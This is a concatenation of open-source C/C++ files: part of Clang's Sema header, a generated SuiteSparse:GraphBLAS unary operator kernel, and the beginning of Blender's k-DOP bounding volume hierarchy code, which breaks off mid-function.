void CodeCompleteIncludedFile(llvm::StringRef Dir, bool IsAngled);
void CodeCompleteNaturalLanguage();
void CodeCompleteAvailabilityPlatformName();
void GatherGlobalCodeCompletions(CodeCompletionAllocator &Allocator,
CodeCompletionTUInfo &CCTUInfo,
SmallVectorImpl<CodeCompletionResult> &Results);
//@}
//===--------------------------------------------------------------------===//
// Extra semantic analysis beyond the C type system
public:
SourceLocation getLocationOfStringLiteralByte(const StringLiteral *SL,
unsigned ByteNo) const;
private:
void CheckArrayAccess(const Expr *BaseExpr, const Expr *IndexExpr,
const ArraySubscriptExpr *ASE=nullptr,
bool AllowOnePastEnd=true, bool IndexNegated=false);
void CheckArrayAccess(const Expr *E);
// Used to grab the relevant information from a FormatAttr and a
// FunctionDeclaration.
struct FormatStringInfo {
unsigned FormatIdx;
unsigned FirstDataArg;
bool HasVAListArg;
};
static bool getFormatStringInfo(const FormatAttr *Format, bool IsCXXMember,
FormatStringInfo *FSI);
bool CheckFunctionCall(FunctionDecl *FDecl, CallExpr *TheCall,
const FunctionProtoType *Proto);
bool CheckObjCMethodCall(ObjCMethodDecl *Method, SourceLocation loc,
ArrayRef<const Expr *> Args);
bool CheckPointerCall(NamedDecl *NDecl, CallExpr *TheCall,
const FunctionProtoType *Proto);
bool CheckOtherCall(CallExpr *TheCall, const FunctionProtoType *Proto);
void CheckConstructorCall(FunctionDecl *FDecl,
ArrayRef<const Expr *> Args,
const FunctionProtoType *Proto,
SourceLocation Loc);
void checkCall(NamedDecl *FDecl, const FunctionProtoType *Proto,
const Expr *ThisArg, ArrayRef<const Expr *> Args,
bool IsMemberFunction, SourceLocation Loc, SourceRange Range,
VariadicCallType CallType);
bool CheckObjCString(Expr *Arg);
ExprResult CheckOSLogFormatStringArg(Expr *Arg);
ExprResult CheckBuiltinFunctionCall(FunctionDecl *FDecl,
unsigned BuiltinID, CallExpr *TheCall);
bool CheckTSBuiltinFunctionCall(llvm::Triple::ArchType Arch,
unsigned BuiltinID, CallExpr *TheCall);
void checkFortifiedBuiltinMemoryFunction(FunctionDecl *FD, CallExpr *TheCall);
bool CheckARMBuiltinExclusiveCall(unsigned BuiltinID, CallExpr *TheCall,
unsigned MaxWidth);
bool CheckNeonBuiltinFunctionCall(unsigned BuiltinID, CallExpr *TheCall);
bool CheckMVEBuiltinFunctionCall(unsigned BuiltinID, CallExpr *TheCall);
bool CheckSVEBuiltinFunctionCall(unsigned BuiltinID, CallExpr *TheCall);
bool CheckCDEBuiltinFunctionCall(unsigned BuiltinID, CallExpr *TheCall);
bool CheckARMCoprocessorImmediate(const Expr *CoprocArg, bool WantCDE);
bool CheckARMBuiltinFunctionCall(unsigned BuiltinID, CallExpr *TheCall);
bool CheckAArch64BuiltinFunctionCall(unsigned BuiltinID, CallExpr *TheCall);
bool CheckBPFBuiltinFunctionCall(unsigned BuiltinID, CallExpr *TheCall);
bool CheckHexagonBuiltinFunctionCall(unsigned BuiltinID, CallExpr *TheCall);
bool CheckHexagonBuiltinArgument(unsigned BuiltinID, CallExpr *TheCall);
bool CheckMipsBuiltinFunctionCall(unsigned BuiltinID, CallExpr *TheCall);
bool CheckMipsBuiltinCpu(unsigned BuiltinID, CallExpr *TheCall);
bool CheckMipsBuiltinArgument(unsigned BuiltinID, CallExpr *TheCall);
bool CheckSystemZBuiltinFunctionCall(unsigned BuiltinID, CallExpr *TheCall);
bool CheckX86BuiltinRoundingOrSAE(unsigned BuiltinID, CallExpr *TheCall);
bool CheckX86BuiltinGatherScatterScale(unsigned BuiltinID, CallExpr *TheCall);
bool CheckX86BuiltinFunctionCall(unsigned BuiltinID, CallExpr *TheCall);
bool CheckPPCBuiltinFunctionCall(unsigned BuiltinID, CallExpr *TheCall);
bool CheckAMDGCNBuiltinFunctionCall(unsigned BuiltinID, CallExpr *TheCall);
bool SemaBuiltinVAStart(unsigned BuiltinID, CallExpr *TheCall);
bool SemaBuiltinVAStartARMMicrosoft(CallExpr *Call);
bool SemaBuiltinUnorderedCompare(CallExpr *TheCall);
bool SemaBuiltinFPClassification(CallExpr *TheCall, unsigned NumArgs);
bool SemaBuiltinVSX(CallExpr *TheCall);
bool SemaBuiltinOSLogFormat(CallExpr *TheCall);
public:
// Used by C++ template instantiation.
ExprResult SemaBuiltinShuffleVector(CallExpr *TheCall);
ExprResult SemaConvertVectorExpr(Expr *E, TypeSourceInfo *TInfo,
SourceLocation BuiltinLoc,
SourceLocation RParenLoc);
private:
bool SemaBuiltinPrefetch(CallExpr *TheCall);
bool SemaBuiltinAllocaWithAlign(CallExpr *TheCall);
bool SemaBuiltinAssume(CallExpr *TheCall);
bool SemaBuiltinAssumeAligned(CallExpr *TheCall);
bool SemaBuiltinLongjmp(CallExpr *TheCall);
bool SemaBuiltinSetjmp(CallExpr *TheCall);
ExprResult SemaBuiltinAtomicOverloaded(ExprResult TheCallResult);
ExprResult SemaBuiltinNontemporalOverloaded(ExprResult TheCallResult);
ExprResult SemaAtomicOpsOverloaded(ExprResult TheCallResult,
AtomicExpr::AtomicOp Op);
ExprResult SemaBuiltinOperatorNewDeleteOverloaded(ExprResult TheCallResult,
bool IsDelete);
bool SemaBuiltinConstantArg(CallExpr *TheCall, int ArgNum,
llvm::APSInt &Result);
bool SemaBuiltinConstantArgRange(CallExpr *TheCall, int ArgNum, int Low,
int High, bool RangeIsError = true);
bool SemaBuiltinConstantArgMultiple(CallExpr *TheCall, int ArgNum,
unsigned Multiple);
bool SemaBuiltinConstantArgPower2(CallExpr *TheCall, int ArgNum);
bool SemaBuiltinConstantArgShiftedByte(CallExpr *TheCall, int ArgNum,
unsigned ArgBits);
bool SemaBuiltinConstantArgShiftedByteOrXXFF(CallExpr *TheCall, int ArgNum,
unsigned ArgBits);
bool SemaBuiltinARMSpecialReg(unsigned BuiltinID, CallExpr *TheCall,
int ArgNum, unsigned ExpectedFieldNum,
bool AllowName);
bool SemaBuiltinARMMemoryTaggingCall(unsigned BuiltinID, CallExpr *TheCall);
public:
enum FormatStringType {
FST_Scanf,
FST_Printf,
FST_NSString,
FST_Strftime,
FST_Strfmon,
FST_Kprintf,
FST_FreeBSDKPrintf,
FST_OSTrace,
FST_OSLog,
FST_Unknown
};
static FormatStringType GetFormatStringType(const FormatAttr *Format);
bool FormatStringHasSArg(const StringLiteral *FExpr);
static bool GetFormatNSStringIdx(const FormatAttr *Format, unsigned &Idx);
private:
bool CheckFormatArguments(const FormatAttr *Format,
ArrayRef<const Expr *> Args,
bool IsCXXMember,
VariadicCallType CallType,
SourceLocation Loc, SourceRange Range,
llvm::SmallBitVector &CheckedVarArgs);
bool CheckFormatArguments(ArrayRef<const Expr *> Args,
bool HasVAListArg, unsigned format_idx,
unsigned firstDataArg, FormatStringType Type,
VariadicCallType CallType,
SourceLocation Loc, SourceRange range,
llvm::SmallBitVector &CheckedVarArgs);
void CheckAbsoluteValueFunction(const CallExpr *Call,
const FunctionDecl *FDecl);
void CheckMaxUnsignedZero(const CallExpr *Call, const FunctionDecl *FDecl);
void CheckMemaccessArguments(const CallExpr *Call,
unsigned BId,
IdentifierInfo *FnName);
void CheckStrlcpycatArguments(const CallExpr *Call,
IdentifierInfo *FnName);
void CheckStrncatArguments(const CallExpr *Call,
IdentifierInfo *FnName);
void CheckReturnValExpr(Expr *RetValExp, QualType lhsType,
SourceLocation ReturnLoc,
bool isObjCMethod = false,
const AttrVec *Attrs = nullptr,
const FunctionDecl *FD = nullptr);
public:
void CheckFloatComparison(SourceLocation Loc, Expr *LHS, Expr *RHS);
private:
void CheckImplicitConversions(Expr *E, SourceLocation CC = SourceLocation());
void CheckBoolLikeConversion(Expr *E, SourceLocation CC);
void CheckForIntOverflow(Expr *E);
void CheckUnsequencedOperations(const Expr *E);
/// Perform semantic checks on a completed expression. This will either
/// be a full-expression or a default argument expression.
void CheckCompletedExpr(Expr *E, SourceLocation CheckLoc = SourceLocation(),
bool IsConstexpr = false);
void CheckBitFieldInitialization(SourceLocation InitLoc, FieldDecl *Field,
Expr *Init);
/// Check if there is a field shadowing.
void CheckShadowInheritedFields(const SourceLocation &Loc,
DeclarationName FieldName,
const CXXRecordDecl *RD,
bool DeclIsField = true);
/// Check if the given expression contains 'break' or 'continue'
/// statement that produces control flow different from GCC.
void CheckBreakContinueBinding(Expr *E);
/// Check whether receiver is mutable ObjC container which
/// attempts to add itself into the container
void CheckObjCCircularContainer(ObjCMessageExpr *Message);
void AnalyzeDeleteExprMismatch(const CXXDeleteExpr *DE);
void AnalyzeDeleteExprMismatch(FieldDecl *Field, SourceLocation DeleteLoc,
bool DeleteWasArrayForm);
public:
/// Register a magic integral constant to be used as a type tag.
void RegisterTypeTagForDatatype(const IdentifierInfo *ArgumentKind,
uint64_t MagicValue, QualType Type,
bool LayoutCompatible, bool MustBeNull);
struct TypeTagData {
TypeTagData() {}
TypeTagData(QualType Type, bool LayoutCompatible, bool MustBeNull) :
Type(Type), LayoutCompatible(LayoutCompatible),
MustBeNull(MustBeNull)
{}
QualType Type;
/// If true, \c Type should be compared with other expression's types for
/// layout-compatibility.
unsigned LayoutCompatible : 1;
unsigned MustBeNull : 1;
};
/// A pair of ArgumentKind identifier and magic value. This uniquely
/// identifies the magic value.
typedef std::pair<const IdentifierInfo *, uint64_t> TypeTagMagicValue;
private:
/// A map from magic value to type information.
std::unique_ptr<llvm::DenseMap<TypeTagMagicValue, TypeTagData>>
TypeTagForDatatypeMagicValues;
/// Peform checks on a call of a function with argument_with_type_tag
/// or pointer_with_type_tag attributes.
void CheckArgumentWithTypeTag(const ArgumentWithTypeTagAttr *Attr,
const ArrayRef<const Expr *> ExprArgs,
SourceLocation CallSiteLoc);
/// Check if we are taking the address of a packed field
/// as this may be a problem if the pointer value is dereferenced.
void CheckAddressOfPackedMember(Expr *rhs);
/// The parser's current scope.
///
/// The parser maintains this state here.
Scope *CurScope;
mutable IdentifierInfo *Ident_super;
mutable IdentifierInfo *Ident___float128;
/// Nullability type specifiers.
IdentifierInfo *Ident__Nonnull = nullptr;
IdentifierInfo *Ident__Nullable = nullptr;
IdentifierInfo *Ident__Null_unspecified = nullptr;
IdentifierInfo *Ident_NSError = nullptr;
/// The handler for the FileChanged preprocessor events.
///
/// Used for diagnostics that implement custom semantic analysis for #include
/// directives, like -Wpragma-pack.
sema::SemaPPCallbacks *SemaPPCallbackHandler;
protected:
friend class Parser;
friend class InitializationSequence;
friend class ASTReader;
friend class ASTDeclReader;
friend class ASTWriter;
public:
/// Retrieve the keyword associated
IdentifierInfo *getNullabilityKeyword(NullabilityKind nullability);
/// The struct behind the CFErrorRef pointer.
RecordDecl *CFError = nullptr;
bool isCFError(RecordDecl *D);
/// Retrieve the identifier "NSError".
IdentifierInfo *getNSErrorIdent();
/// Retrieve the parser's current scope.
///
/// This routine must only be used when it is certain that semantic analysis
/// and the parser are in precisely the same context, which is not the case
/// when, e.g., we are performing any kind of template instantiation.
/// Therefore, the only safe places to use this scope are in the parser
/// itself and in routines directly invoked from the parser and *never* from
/// template substitution or instantiation.
Scope *getCurScope() const { return CurScope; }
void incrementMSManglingNumber() const {
return CurScope->incrementMSManglingNumber();
}
IdentifierInfo *getSuperIdentifier() const;
IdentifierInfo *getFloat128Identifier() const;
Decl *getObjCDeclContext() const;
DeclContext *getCurLexicalContext() const {
return OriginalLexicalContext ? OriginalLexicalContext : CurContext;
}
const DeclContext *getCurObjCLexicalContext() const {
const DeclContext *DC = getCurLexicalContext();
// A category implicitly has the attribute of the interface.
if (const ObjCCategoryDecl *CatD = dyn_cast<ObjCCategoryDecl>(DC))
DC = CatD->getClassInterface();
return DC;
}
/// Determine the number of levels of enclosing template parameters. This is
/// only usable while parsing. Note that this does not include dependent
/// contexts in which no template parameters have yet been declared, such as
/// in a terse function template or generic lambda before the first 'auto' is
/// encountered.
unsigned getTemplateDepth(Scope *S) const;
/// To be used for checking whether the arguments being passed to
/// function exceeds the number of parameters expected for it.
static bool TooManyArguments(size_t NumParams, size_t NumArgs,
bool PartialOverloading = false) {
// We check whether we're just after a comma in code-completion.
if (NumArgs > 0 && PartialOverloading)
return NumArgs + 1 > NumParams; // If so, we view as an extra argument.
return NumArgs > NumParams;
}
// Emitting members of dllexported classes is delayed until the class
// (including field initializers) is fully parsed.
SmallVector<CXXRecordDecl*, 4> DelayedDllExportClasses;
SmallVector<CXXMethodDecl*, 4> DelayedDllExportMemberFunctions;
private:
int ParsingClassDepth = 0;
class SavePendingParsedClassStateRAII {
public:
SavePendingParsedClassStateRAII(Sema &S) : S(S) { swapSavedState(); }
~SavePendingParsedClassStateRAII() {
assert(S.DelayedOverridingExceptionSpecChecks.empty() &&
"there shouldn't be any pending delayed exception spec checks");
assert(S.DelayedEquivalentExceptionSpecChecks.empty() &&
"there shouldn't be any pending delayed exception spec checks");
swapSavedState();
}
private:
Sema &S;
decltype(DelayedOverridingExceptionSpecChecks)
SavedOverridingExceptionSpecChecks;
decltype(DelayedEquivalentExceptionSpecChecks)
SavedEquivalentExceptionSpecChecks;
void swapSavedState() {
SavedOverridingExceptionSpecChecks.swap(
S.DelayedOverridingExceptionSpecChecks);
SavedEquivalentExceptionSpecChecks.swap(
S.DelayedEquivalentExceptionSpecChecks);
}
};
/// Helper class that collects misaligned member designations and
/// their location info for delayed diagnostics.
struct MisalignedMember {
Expr *E;
RecordDecl *RD;
ValueDecl *MD;
CharUnits Alignment;
MisalignedMember() : E(), RD(), MD(), Alignment() {}
MisalignedMember(Expr *E, RecordDecl *RD, ValueDecl *MD,
CharUnits Alignment)
: E(E), RD(RD), MD(MD), Alignment(Alignment) {}
explicit MisalignedMember(Expr *E)
: MisalignedMember(E, nullptr, nullptr, CharUnits()) {}
bool operator==(const MisalignedMember &m) { return this->E == m.E; }
};
/// Small set of gathered accesses to potentially misaligned members
/// due to the packed attribute.
SmallVector<MisalignedMember, 4> MisalignedMembers;
/// Adds an expression to the set of gathered misaligned members.
void AddPotentialMisalignedMembers(Expr *E, RecordDecl *RD, ValueDecl *MD,
CharUnits Alignment);
public:
/// Diagnoses the current set of gathered accesses. This typically
/// happens at full expression level. The set is cleared after emitting the
/// diagnostics.
void DiagnoseMisalignedMembers();
/// This function checks if the expression is in the sef of potentially
/// misaligned members and it is converted to some pointer type T with lower
/// or equal alignment requirements. If so it removes it. This is used when
/// we do not want to diagnose such misaligned access (e.g. in conversions to
/// void*).
void DiscardMisalignedMemberAddress(const Type *T, Expr *E);
/// This function calls Action when it determines that E designates a
/// misaligned member due to the packed attribute. This is used to emit
/// local diagnostics like in reference binding.
void RefersToMemberWithReducedAlignment(
Expr *E,
llvm::function_ref<void(Expr *, RecordDecl *, FieldDecl *, CharUnits)>
Action);
/// Describes the reason a calling convention specification was ignored, used
/// for diagnostics.
enum class CallingConventionIgnoredReason {
ForThisTarget = 0,
VariadicFunction,
ConstructorDestructor,
BuiltinFunction
};
};
/// RAII object that enters a new expression evaluation context.
class EnterExpressionEvaluationContext {
Sema &Actions;
bool Entered = true;
public:
EnterExpressionEvaluationContext(
Sema &Actions, Sema::ExpressionEvaluationContext NewContext,
Decl *LambdaContextDecl = nullptr,
Sema::ExpressionEvaluationContextRecord::ExpressionKind ExprContext =
Sema::ExpressionEvaluationContextRecord::EK_Other,
bool ShouldEnter = true)
: Actions(Actions), Entered(ShouldEnter) {
if (Entered)
Actions.PushExpressionEvaluationContext(NewContext, LambdaContextDecl,
ExprContext);
}
EnterExpressionEvaluationContext(
Sema &Actions, Sema::ExpressionEvaluationContext NewContext,
Sema::ReuseLambdaContextDecl_t,
Sema::ExpressionEvaluationContextRecord::ExpressionKind ExprContext =
Sema::ExpressionEvaluationContextRecord::EK_Other)
: Actions(Actions) {
Actions.PushExpressionEvaluationContext(
NewContext, Sema::ReuseLambdaContextDecl, ExprContext);
}
enum InitListTag { InitList };
EnterExpressionEvaluationContext(Sema &Actions, InitListTag,
bool ShouldEnter = true)
: Actions(Actions), Entered(false) {
// In C++11 onwards, narrowing checks are performed on the contents of
// braced-init-lists, even when they occur within unevaluated operands.
// Therefore we still need to instantiate constexpr functions used in such
// a context.
if (ShouldEnter && Actions.isUnevaluatedContext() &&
Actions.getLangOpts().CPlusPlus11) {
Actions.PushExpressionEvaluationContext(
Sema::ExpressionEvaluationContext::UnevaluatedList);
Entered = true;
}
}
~EnterExpressionEvaluationContext() {
if (Entered)
Actions.PopExpressionEvaluationContext();
}
};
DeductionFailureInfo
MakeDeductionFailureInfo(ASTContext &Context, Sema::TemplateDeductionResult TDK,
sema::TemplateDeductionInfo &Info);
/// Contains a late templated function.
/// Will be parsed at the end of the translation unit, used by Sema & Parser.
struct LateParsedTemplate {
CachedTokens Toks;
/// The template function declaration to be late parsed.
Decl *D;
};
} // end namespace clang
namespace llvm {
// Hash a FunctionDeclAndLoc by looking at both its FunctionDecl and its
// SourceLocation.
template <> struct DenseMapInfo<clang::Sema::FunctionDeclAndLoc> {
using FunctionDeclAndLoc = clang::Sema::FunctionDeclAndLoc;
using FDBaseInfo = DenseMapInfo<clang::CanonicalDeclPtr<clang::FunctionDecl>>;
static FunctionDeclAndLoc getEmptyKey() {
return {FDBaseInfo::getEmptyKey(), clang::SourceLocation()};
}
static FunctionDeclAndLoc getTombstoneKey() {
return {FDBaseInfo::getTombstoneKey(), clang::SourceLocation()};
}
static unsigned getHashValue(const FunctionDeclAndLoc &FDL) {
return hash_combine(FDBaseInfo::getHashValue(FDL.FD),
FDL.Loc.getRawEncoding());
}
static bool isEqual(const FunctionDeclAndLoc &LHS,
const FunctionDeclAndLoc &RHS) {
return LHS.FD == RHS.FD && LHS.Loc == RHS.Loc;
}
};
} // namespace llvm
#endif
|
GB_unaryop__minv_uint32_fp32.c | //------------------------------------------------------------------------------
// GB_unaryop: hard-coded functions for each built-in unary operator
//------------------------------------------------------------------------------
// SuiteSparse:GraphBLAS, Timothy A. Davis, (c) 2017-2019, All Rights Reserved.
// http://suitesparse.com See GraphBLAS/Doc/License.txt for license.
//------------------------------------------------------------------------------
// If this file is in the Generated/ folder, do not edit it (auto-generated).
#include "GB.h"
#ifndef GBCOMPACT
#include "GB_control.h"
#include "GB_iterator.h"
#include "GB_unaryop__include.h"
// C=unop(A) is defined by the following types and operators:
// op(A) function: GB_unop__minv_uint32_fp32
// op(A') function: GB_tran__minv_uint32_fp32
// C type: uint32_t
// A type: float
// cast: uint32_t cij ; GB_CAST_UNSIGNED(cij,aij,32)
// unaryop: cij = GB_IMINV_UNSIGNED (aij, 32)
#define GB_ATYPE \
float
#define GB_CTYPE \
uint32_t
// aij = Ax [pA]
#define GB_GETA(aij,Ax,pA) \
float aij = Ax [pA]
#define GB_CX(p) Cx [p]
// unary operator
#define GB_OP(z, x) \
z = GB_IMINV_UNSIGNED (x, 32) ;
// casting
#define GB_CASTING(z, x) \
uint32_t z ; GB_CAST_UNSIGNED(z,x,32) ;
// cij = op (cast (aij))
#define GB_CAST_OP(pC,pA) \
{ \
/* aij = Ax [pA] */ \
GB_GETA (aij, Ax, pA) ; \
/* Cx [pC] = op (cast (aij)) */ \
GB_CASTING (x, aij) ; \
GB_OP (GB_CX (pC), x) ; \
}
// disable this operator and use the generic case if these conditions hold
#define GB_DISABLE \
(GxB_NO_MINV || GxB_NO_UINT32 || GxB_NO_FP32)
//------------------------------------------------------------------------------
// Cx = op (cast (Ax)): apply a unary operator
//------------------------------------------------------------------------------
GrB_Info GB_unop__minv_uint32_fp32
(
uint32_t *restrict Cx,
const float *restrict Ax,
int64_t anz,
int nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
#pragma omp parallel for num_threads(nthreads) schedule(static)
for (int64_t p = 0 ; p < anz ; p++)
{
GB_CAST_OP (p, p) ;
}
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// C = op (cast (A')): transpose, typecast, and apply a unary operator
//------------------------------------------------------------------------------
GrB_Info GB_tran__minv_uint32_fp32
(
GrB_Matrix C,
const GrB_Matrix A,
int64_t *restrict *Rowcounts,
GBI_single_iterator Iter,
const int64_t *restrict A_slice,
int naslice
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
#define GB_PHASE_2_OF_2
#include "GB_unaryop_transpose.c"
return (GrB_SUCCESS) ;
#endif
}
#endif
|
BLI_kdopbvh.c | /*
*
* ***** BEGIN GPL LICENSE BLOCK *****
*
* This program is free software; you can redistribute it and/or
* modify it under the terms of the GNU General Public License
* as published by the Free Software Foundation; either version 2
* of the License, or (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software Foundation,
* Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
*
* The Original Code is Copyright (C) 2006 by NaN Holding BV.
* All rights reserved.
*
* The Original Code is: all of this file.
*
* Contributor(s): Daniel Genrich, Andre Pinto
*
* ***** END GPL LICENSE BLOCK *****
*/
/** \file blender/blenlib/intern/BLI_kdopbvh.c
* \ingroup bli
*/
#include <assert.h>
#include "MEM_guardedalloc.h"
#include "BLI_utildefines.h"
#include "BLI_kdopbvh.h"
#include "BLI_math.h"
#ifdef _OPENMP
#include <omp.h>
#endif
#define MAX_TREETYPE 32
#define DEFAULT_FIND_NEAREST_HEAP_SIZE 1024
typedef struct BVHNode
{
struct BVHNode **children;
struct BVHNode *parent; // some user defined traversed need that
struct BVHNode *skip[2];
float *bv; // Bounding volume of all nodes, max 13 axis
int index; // face, edge, vertex index
char totnode; // how many nodes are used, used for speedup
char main_axis; // Axis used to split this node
} BVHNode;
struct BVHTree
{
BVHNode **nodes;
BVHNode *nodearray; /* pre-alloc branch nodes */
BVHNode **nodechild; // pre-alloc childs for nodes
float *nodebv; // pre-alloc bounding-volumes for nodes
float epsilon; /* epslion is used for inflation of the k-dop */
int totleaf; // leafs
int totbranch;
char tree_type; // type of tree (4 => quadtree)
char axis; // kdop type (6 => OBB, 7 => AABB, ...)
char start_axis, stop_axis; // KDOP_AXES array indices according to axis
};
typedef struct BVHOverlapData
{
BVHTree *tree1, *tree2;
BVHTreeOverlap *overlap;
int i, max_overlap; /* i is number of overlaps */
int start_axis, stop_axis;
} BVHOverlapData;
typedef struct BVHNearestData
{
BVHTree *tree;
const float *co;
BVHTree_NearestPointCallback callback;
void *userdata;
float proj[13]; //coordinates projection over axis
BVHTreeNearest nearest;
} BVHNearestData;
typedef struct BVHRayCastData
{
BVHTree *tree;
BVHTree_RayCastCallback callback;
void *userdata;
BVHTreeRay ray;
float ray_dot_axis[13];
float idot_axis[13];
int index[6];
BVHTreeRayHit hit;
} BVHRayCastData;
////////////////////////////////////////m
////////////////////////////////////////////////////////////////////////
// Bounding Volume Hierarchy Definition
//
// Notes: From OBB until 26-DOP --> all bounding volumes possible, just choose type below
// Notes: You have to choose the type at compile time ITM
// Notes: You can choose the tree type --> binary, quad, octree, choose below
////////////////////////////////////////////////////////////////////////
static float KDOP_AXES[13][3] =
{ {1.0, 0, 0}, {0, 1.0, 0}, {0, 0, 1.0}, {1.0, 1.0, 1.0}, {1.0, -1.0, 1.0}, {1.0, 1.0, -1.0},
{1.0, -1.0, -1.0}, {1.0, 1.0, 0}, {1.0, 0, 1.0}, {0, 1.0, 1.0}, {1.0, -1.0, 0}, {1.0, 0, -1.0},
{0, 1.0, -1.0}
};
/*
* Generic push and pop heap
*/
#define PUSH_HEAP_BODY(HEAP_TYPE,PRIORITY,heap,heap_size) \
{ \
HEAP_TYPE element = heap[heap_size-1]; \
int child = heap_size-1; \
while(child != 0) \
{ \
int parent = (child-1) / 2; \
if(PRIORITY(element, heap[parent])) \
{ \
heap[child] = heap[parent]; \
child = parent; \
} \
else break; \
} \
heap[child] = element; \
}
#define POP_HEAP_BODY(HEAP_TYPE, PRIORITY,heap,heap_size) \
{ \
HEAP_TYPE element = heap[heap_size-1]; \
int parent = 0; \
while(parent < (heap_size-1)/2 ) \
{ \
int child2 = (parent+1)*2; \
if(PRIORITY(heap[child2-1], heap[child2])) \
--child2; \
\
if(PRIORITY(element, heap[child2])) \
break; \
\
heap[parent] = heap[child2]; \
parent = child2; \
} \
heap[parent] = element; \
}
#if 0
static int ADJUST_MEMORY(void *local_memblock, void **memblock, int new_size, int *max_size, int size_per_item)
{
int new_max_size = *max_size * 2;
void *new_memblock = NULL;
if(new_size <= *max_size)
return TRUE;
if(*memblock == local_memblock)
{
new_memblock = malloc( size_per_item * new_max_size );
memcpy( new_memblock, *memblock, size_per_item * *max_size );
}
else
new_memblock = realloc(*memblock, size_per_item * new_max_size );
if(new_memblock)
{
*memblock = new_memblock;
*max_size = new_max_size;
return TRUE;
}
else
return FALSE;
}
#endif
//////////////////////////////////////////////////////////////////////////////////////////////////////
// Introsort
// with permission deriven from the following Java code:
// http://ralphunden.net/content/tutorials/a-guide-to-introsort/
// and he derived it from the SUN STL
//////////////////////////////////////////////////////////////////////////////////////////////////////
//static int size_threshold = 16;
/*
* Common methods for all algorithms
*/
/*static int floor_lg(int a)
{
return (int)(floor(log(a)/log(2)));
}*/
/*
* Insertion sort algorithm
*/
static void bvh_insertionsort(BVHNode **a, int lo, int hi, int axis)
{
int i,j;
BVHNode *t;
for (i=lo; i < hi; i++)
{
j=i;
t = a[i];
while((j!=lo) && (t->bv[axis] < (a[j-1])->bv[axis]))
{
a[j] = a[j-1];
j--;
}
a[j] = t;
}
}
static int bvh_partition(BVHNode **a, int lo, int hi, BVHNode * x, int axis)
{
int i=lo, j=hi;
while (1)
{
while ((a[i])->bv[axis] < x->bv[axis]) i++;
j--;
while (x->bv[axis] < (a[j])->bv[axis]) j--;
if(!(i < j))
return i;
SWAP( BVHNode* , a[i], a[j]);
i++;
}
}
/*
* Heapsort algorithm
*/
#if 0
static void bvh_downheap(BVHNode **a, int i, int n, int lo, int axis)
{
BVHNode * d = a[lo+i-1];
int child;
while (i<=n/2)
{
child = 2*i;
if ((child < n) && ((a[lo+child-1])->bv[axis] < (a[lo+child])->bv[axis]))
{
child++;
}
if (!(d->bv[axis] < (a[lo+child-1])->bv[axis])) break;
a[lo+i-1] = a[lo+child-1];
i = child;
}
a[lo+i-1] = d;
}
static void bvh_heapsort(BVHNode **a, int lo, int hi, int axis)
{
int n = hi-lo, i;
for (i=n/2; i>=1; i=i-1)
{
bvh_downheap(a, i,n,lo, axis);
}
for (i=n; i>1; i=i-1)
{
SWAP(BVHNode*, a[lo],a[lo+i-1]);
bvh_downheap(a, 1,i-1,lo, axis);
}
}
#endif
static BVHNode *bvh_medianof3(BVHNode **a, int lo, int mid, int hi, int axis) // returns Sortable
{
if ((a[mid])->bv[axis] < (a[lo])->bv[axis])
{
if ((a[hi])->bv[axis] < (a[mid])->bv[axis])
return a[mid];
else
{
if ((a[hi])->bv[axis] < (a[lo])->bv[axis])
return a[hi];
else
return a[lo];
}
}
else
{
if ((a[hi])->bv[axis] < (a[mid])->bv[axis])
{
if ((a[hi])->bv[axis] < (a[lo])->bv[axis])
return a[lo];
else
return a[hi];
}
else
return a[mid];
}
}
#if 0
/*
* Quicksort algorithm modified for Introsort
*/
static void bvh_introsort_loop (BVHNode **a, int lo, int hi, int depth_limit, int axis)
{
int p;
while (hi-lo > size_threshold)
{
if (depth_limit == 0)
{
bvh_heapsort(a, lo, hi, axis);
return;
}
depth_limit=depth_limit-1;
p=bvh_partition(a, lo, hi, bvh_medianof3(a, lo, lo+((hi-lo)/2)+1, hi-1, axis), axis);
bvh_introsort_loop(a, p, hi, depth_limit, axis);
hi=p;
}
}
static void sort(BVHNode **a0, int begin, int end, int axis)
{
if (begin < end)
{
BVHNode **a=a0;
bvh_introsort_loop(a, begin, end, 2*floor_lg(end-begin), axis);
bvh_insertionsort(a, begin, end, axis);
}
}
static void sort_along_axis(BVHTree *tree, int start, int end, int axis)
{
sort(tree->nodes, start, end, axis);
}
#endif
//after a call to this function you can expect one of:
// every node to left of a[n] are smaller or equal to it
// every node to the right of a[n] are greater or equal to it
static int partition_nth_element(BVHNode **a, int _begin, int _end, int n, int axis)
{
int begin = _begin, end = _end, cut;
while(end-begin > 3)
{
cut = bvh_partition(a, begin, end, bvh_medianof3(a, begin, (begin+end)/2, end-1, axis), axis );
if(cut <= n)
begin = cut;
else
end = cut;
}
bvh_insertionsort(a, begin, end, axis);
return n;
}
//////////////////////////////////////////////////////////////////////////////////////////////////////
static void build_skip_links(BVHTree *tree, BVHNode *node, BVHNode *left, BVHNode *right)
{
int i;
node->skip[0] = left;
node->skip[1] = right;
for (i = 0; i < node->totnode; i++)
{
if(i+1 < node->totnode)
build_skip_links(tree, node->children[i], left, node->children[i+1] );
else
build_skip_links(tree, node->children[i], left, right );
left = node->children[i];
}
}
/*
* BVHTree bounding volumes functions
*/
static void create_kdop_hull(BVHTree *tree, BVHNode *node, float *co, int numpoints, int moving)
{
float newminmax;
float *bv = node->bv;
int i, k;
// don't init boudings for the moving case
if(!moving)
{
for (i = tree->start_axis; i < tree->stop_axis; i++)
{
bv[2*i] = FLT_MAX;
bv[2*i + 1] = -FLT_MAX;
}
}
for(k = 0; k < numpoints; k++)
{
// for all Axes.
for (i = tree->start_axis; i < tree->stop_axis; i++)
{
newminmax = dot_v3v3(&co[k * 3], KDOP_AXES[i]);
if (newminmax < bv[2 * i])
bv[2 * i] = newminmax;
if (newminmax > bv[(2 * i) + 1])
bv[(2 * i) + 1] = newminmax;
}
}
}
// depends on the fact that the BVH's for each face is already build
static void refit_kdop_hull(BVHTree *tree, BVHNode *node, int start, int end)
{
float newmin,newmax;
int i, j;
float *bv = node->bv;
for (i = tree->start_axis; i < tree->stop_axis; i++)
{
bv[2*i] = FLT_MAX;
